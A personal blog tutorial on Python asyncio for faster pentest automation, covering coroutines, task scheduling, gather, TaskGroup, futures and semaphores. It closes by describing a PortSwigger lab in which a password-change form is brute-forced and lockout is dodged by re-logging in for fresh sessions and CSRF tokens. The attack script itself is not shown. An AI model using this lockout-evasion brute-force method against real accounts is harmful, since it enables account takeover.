Hi there, this doc is gonna be loooong so you might need to grab some coffee

In penetration testing, speed can make all the difference (as soon as you’re not getting caught). The faster your scripts can send requests, gather responses, and process results, the more time you have to focus on actual analysis. With normal synchronous Python scripts, every task waits for the one before it to finish safe, but slow.

That’s why I turned to async programming with asyncio. By running multiple tasks at once, asyncio transformed one of my scripts from sluggish to blazing fast, even outperforming Burp Suite Pro in certain cases. In this post, I’ll share how I used asyncio in a real pentesting lab and why it’s quickly becoming one of my favorite tools for automation.

What is Asynchronous programming ?

Imagine if you write a code like this

python
def download_file(file):
    print("Downloading {file}")
    time.sleep(2) #imagine file takes 2 seconds to download
    print("{file} Downloaded")

def main():
    downlaod_file("file1")
    download_file("file2")

main()

in a code like this if the file needs 2 seconds to download it will need 4 seconds to be done the output will be like this

python
Downloading file1
2 seconds sleep
file1 Downloaded
Downloading file2
2 seconds sleep 
file2 Downloaded

but what if i told you that i can make it use 2 seconds only ?

  • 2 seconds difference ? yeah not a big deal right ? but the trick here that in real scripts you’re not sending 2 requests you are sending hundreds of them maybe even thousands so it will save a lot of time

Concurrency

there is a lot of code structure that makes you apply concurrency in code.

but what is concurrency in first place ? it’s the idea of structuring programs so multiple tasks can progress together

and there is more than one way to apply that

  1. Multi-threading → Multiple threads in one process which is good for I/O-bound tasks (network calls, reading files) but we don’t wanna overhead the CPU for some script

  2. Multi-processing → Spawns multiple processes which is True parallelism and great for CPU-bound work but it is heavier that threading

  3. Asynchronous → Single-threaded, cooperative multitasking, Best for high-volume I/O tasks (like thousands of HTTP requests) which is what we are looking for specially because it provides low overhead on processor

Asynchronous Programming

we are gonna make the application look like it is running multi-threaded but in fact it is single threaded, when a request takes a break (I/O operation) it won’t hold the app but it will give up its place to another request and so on, one it one out

Python Async io

so i will be using python to illustrate the idea but you can use any language you want

💡
Make sure to read the comments in the code

Event loop in Asyncio

  • it is like a circle that all tasks running around to get its chance to get executed

  • if one task got its chance into that circle and got executed and needed some I/O time it won't waste time by keeping the other tasks out of the circle but it will step aside and make a room for other task to get in the circle with it to get executed

  • when the I/O is done the task will be completed and so on

Coroutine

  • Coroutine is a special kind of function that can pause and resume later

    and we use the async keyword to define that kind of coroutine functions

python
import asyncio  
async def main(): 
    print("start of main coroutine")  
      
asyncio.run(main())
  • the coroutine functions doesn't run directly on call but it returns coroutine object

  • so if we called just main() without asyncio.run(main()) it won't run but it will just return something called coroutine object, but we called the function inside the asyncio.run() we won't see the difference because it will return the object and use it to run the coroutine directly without us noticing

the await keyword is what actually executes (or resumes) coroutine and it can't be used outside async function, lets take a look at this example

python
import asyncio

async def fetch_data(delay):  # defines a coroutine that simulates time-consuming task
    print('Fetching data...')
    await asyncio.sleep(delay)  # simulates I/O operation with a sleep
    print("Data Fetched")
    return {
        "data": "some data"  # return some data
    }

async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = fetch_data(2)

    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")
    print("end of main coroutine")

asyncio.run(main())  # run the main coroutine

so the output will be Screenshot 2025-07-12 203731.png

you might think so if the await pauses the execution where is the difference it looks like it is a synchronous function as we are waiting for result, that's a valid point but only in that example because we gave the event loop only one coroutine so the event loop while pausing will look around and ask if there is something else to do and while there is nothing else to do nothing can be done it will just wait, but if we look at this example

  • still there is no difference it will also wait for first one to be done and then go for second one

  • why does this happen ?

    even though we made 2 coroutines but we didn't schedule them to the event loop before task 1 starts

How to Schedule a task, first way !

one of the ways to schedule a task is asyncio.create_task(function_name())

python
async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")

    background_task = asyncio.create_task(background())
    await background_task
    print("end of main coroutine")

still nothing happen because i schedule the background task after the first one already paused the main coroutine

so TL;DR you have to create the 2 tasks before you await any one of them if you need event loop to switch between them

python
import asyncio
async def fetch_data(delay):  # defines a coroutine that simulates time-consuming task
    print('Fetching data...')
    await asyncio.sleep(delay)  # simulates I/O operation with a sleep
    print("Data Fetched")
    return {
        "data": "some data"  # return some data
    }
    
async def background():  # another coroutine
    for i in range(5):  # normal loop
        print(f"background {i}")  # print which step are we at
        await asyncio.sleep(0.4)  # wait for 0.4 seconds which means 5 steps are exactly 2 seconds the waiting time of the fetch data

async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    background_task = asyncio.create_task(background())
    result = await task  # await the fetch_data coroutine, pausing execution of main until the fetch_data completes
    print(f"received result: {result}")
    await background_task
    print("end of main coroutine")

asyncio.run(main())  # run the main coroutine

and here comes the wonder Screenshot 2025-09-05 165621.png

even though the create_task schedule and run but we still to do await
why should we use await even though it will run ?

  1. risk it being cancelled early

  2. won't know when it is done

  3. can't access results

why it might get cancelled ? because we didn't pause the execution of main coroutine so once it is done the application will exit so if the main coroutine is short like printing a statement without await we will exit after that statement is printed even if the second coroutine like background or fetch isn't done yet

What happens if the paused coroutine done its I/O and the running coroutine right now doesn't have any I/O to do ?

think of the question like this

I gave my position to someone because i don’t need right now but when i needed it he wasn’t done yet will i kick him out or i will wait for him to finish

so what happened is that we scheduled both of them → and awaited first one → blocked I/O so we switched to second coroutine (background) but the background doesn't have any sleep after the 2 seconds so should it keep running and then return to the fetch_data or it should go back to fetch data then comeback to complete the background

this situation is tricky and It’s result isn’t guaranteed, it could do any of the options but usually it will resume the paused first

so lets look at this code

python
async def main():  # define another coroutine that calls the first coroutine
    print("start of main coroutine")
    task = asyncio.create_task(fetch_data(2))
    background_task = asyncio.create_task(background())
    result = await task
    print(f"received result: {result}")
    print("end of main coroutine")
  • just the exact code above but i deleted await background in that main function

  • remember when we said that if we didn't use await it might get cancelled early here is a proof of that

  • what is guaranteed in that code that it will print

    • main coroutine

    • fetching data

    • background from 0 to 4

  • what happens after that is

    • you might complete the background and it will print the end statements of background

    • it might also go back to fetch data then comeback to background

  • but there is a good one that might happen ?

    • it could go to fetch data and then go back to the main result and we didn't await for background so it will print received results and end of main routine and exit without printing what we expected

note that await → pauses the coroutine and waits for the other coroutine to get the results back it also → makes sure to continue where we paused

How to Schedule a task, second way !

  • so instead of creating each task on its own, we will use what's known as gather function

  • it is a faster way to create multiple tasks, and await them in the same line of code

python
import asyncio

async def fetch_data(id, sleep_time):
    print(f"Coroutine {id} starting to fetch data")
    await asyncio.sleep(sleep_time)
    return {
        "id": id,
        "data": f"sample data from coroutine {id}"
    }

async def main():
    results = await asyncio.gather(fetch_data(1,2), fetch_data(2,1), fetch_data(3,3))

    for result in results:
        print(f"received result: {result}")

asyncio.run(main())

you can even work with list comprehension in gather function to faster the tasks creation even more but the problem with gather

  • it isn't very good with errors handling so if one coroutine raises an error will stop the coroutines if you didn't handle each error manually

  • but there is an option to use await asyncio.gather(func(), func(), func(), return_exceptions=True) which is gonna return exception at result instead of breaking the program

How to Schedule a task, third way !

using TaskGroup, is the same as gather but with a better error propagation and task cancellation lets see the difference

  • Both cancel remaining tasks on failure, but:

    • gather(): Gets only the error that caused the exception (the first one it encounters)

    • TaskGroup: Collects errors on its way back (any exceptions that occurred before cancellation could stop them) in next script it is gather but with return_exceptions=False which is the default

in next script it is gather but with return_exceptions=False which is the default

Screenshot 2025-09-05 172140.png

so the output will look like this and this isn't a clean execution because we didn't return another error raised which is API-2 and this happens because gather cancels all tasks on first failure and returns only the exception that caused that error unless you use return_exceptions=True which will return this

Screenshot 2025-09-05 172158.png

but with TaskGroup it is gonna cancel all tasks also but return all found exceptions so far specially if both errors are raised at the same moment like next script

Screenshot 2025-09-05 172228.png

and this is the output, what happens that they both returned from sleep at the same time so both raise error around he same exact moment there is a difference but the internal handling of errors on both is what causes this Timing of Exception Processing both cancel the tasks but

  • gather(): Fails fast - processes the first exception immediately

  • TaskGroup: Waits to collect all exceptions that occur during the brief cancellation window

and this difference appears actually if you look at this

python
# gather() - traditional single exception
try:
    await asyncio.gather(...)
except Exception as e:  # Only one exception

# TaskGroup - exception groups (PEP 654)
try:
    async with asyncio.TaskGroup():
        ...
except* Exception as eg:  # ExceptionGroup containing multiple
    for exc in eg.exceptions:
        ...

the TaskGroup expects multiple errors so if i used except Exception with Task group without the * for unpacking i will get an error

image

even though when i made sure that there is only one error will return, still got that error and all this happens because something called futures and we will get to it later

another reason for that

python
# gather() - can only store one exception
master_future.set_exception(first_exception)  # Overwrites any previous

# TaskGroup - accumulates exceptions
exception_list.append(exception1)
exception_list.append(exception2)
exception_list.append(exception3)

Futures

  • future is an object that represents computation that hasn't completed yet think of like a promise or a placeholder either by:

    • Completion (set_result(value))

    • Failure (set_exception(error))

    • Cancelled (.cancel())

    • Done --> Whether the future is finished (success, error, or cancel)

  • so it returns two states

    • done or not

    • done by what state exactly --> completion, failure, cancelled

python
master_future = asyncio.Future() # gather() internally does something like:

# When first task fails:
master_future.set_exception(first_exception)  # Future can only hold ONE exception
# Other exceptions are lost because Future is already "done" with an exception
python
# TaskGroup internally does something like:
task_futures = []  # List of individual futures
exception_list = []  # Separate collection for exceptions

# When tasks fail:
for future in task_futures:
    if future.done() and future.exception():
        exception_list.append(future.exception())  # Collect ALL exceptions

# Then wraps them in ExceptionGroup
raise ExceptionGroup("Multiple exceptions", exception_list)

Semaphore

it is the control tool that limits how many tasks can access a resource at the same time

python
import asyncio

sem = asyncio.Semaphore(3)  # allow 3 concurrent accesses

async def task(id):
    print(f"Task {id} waiting...")
    async with sem:  # acquire the semaphore
        print(f"Task {id} acquired semaphore ✅")
        await asyncio.sleep(2)
        print(f"Task {id} releasing semaphore ❌")

async def main():
    await asyncio.gather(*(task(i) for i in range(6)))

asyncio.run(main())

Screenshot 2025-09-05 172551.png

  • imagine it like an office the office's door start at async with sem and from that point there is a max size in that office so in last example we couldn't handle more than 3 people at same time

  • but if those people took too much time doing something we can step outside and prep the next group to have there turn print(waiting) in this case

real-world example (easier to understand)

this is the script for one of portswigger Labs, it was about Authentication attacks with the title Lab: Password brute-force via password change

in this Lab we wanted to brute force current password parameter but we get blocked when we do too much wrong password attempts

so we have to re-login before each attempt to grab a new session and grab CSRF token

but with all that much of requests and brute-forcing that will take a lot of time even with burp-suite pro edition it will take a lot of time

so why won’t we make a script for it ?

the script is commented by an AI model so pay some attention (might have missed something)

and with that script i solved the Lab under 4 minutes

from 45 minutes with sequential python to 23 minutes with burp pro to 4 minutes with asyncio

Wrapping up

so that was it -what ! do you need more it looks like it’s gonna be 40 minutes read-

It’s Okay that you still didn’t figure it out all at once but you have AI models go have some chit chat with any of them for deep understanding

stay tuned for a lot of stuff coming out soon -doing a lot of scripting and tools this days-

feel free to reach out to me

Peace Out GIFs | Tenor

Adios Amigos